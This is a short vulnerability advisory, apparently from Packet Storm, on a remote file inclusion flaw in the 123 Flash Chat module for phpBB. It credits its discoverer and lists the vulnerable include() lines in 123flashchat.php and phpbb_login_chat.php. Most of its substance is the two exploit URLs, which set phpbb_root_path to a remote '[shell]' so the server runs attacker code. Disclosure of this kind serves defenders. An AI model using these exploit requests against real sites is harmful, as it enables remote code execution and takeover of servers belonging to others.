The 123 Flash Chat module for phpBB suffers from a remote file inclusion vulnerability.
59663f994af87d43c4e67b9dce37464841bb0129f8175173761e4d97534a2c89#########################################################################################
Script : 123 Flash Chat Module for phpBB #
Discovered By : F10 #
Contact : by_f10@hotmail.com #
Site : http://by-f10.com #
Greetz : by_emR3 , H0tturk , TaRanTuLa , gsy , ercu_145 , #
LupuS , m0sted , CyberGhost ... . #
>From : Turkey #
Download : http://php.arsivimiz.com/indir.php?ID=996&sIslem=Indir #
#########################################################################################
The bugs are in :
path/123flashchat.php include($phpbb_root_path . 'extension.inc');
path/123flashchat.php include($phpbb_root_path . 'common.'.$phpEx);
path/phpbb_login_chat.php include($phpbb_root_path . 'extension.inc');
path/phpbb_login_chat.php include($phpbb_root_path . 'common.'.$phpEx);
exploitz :
www.site.com/path/123flashchat.php?phpbb_root_path=[shell]
www.site.com/path/phpbb_login_chat.php?phpbb_root_path=[shell]
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed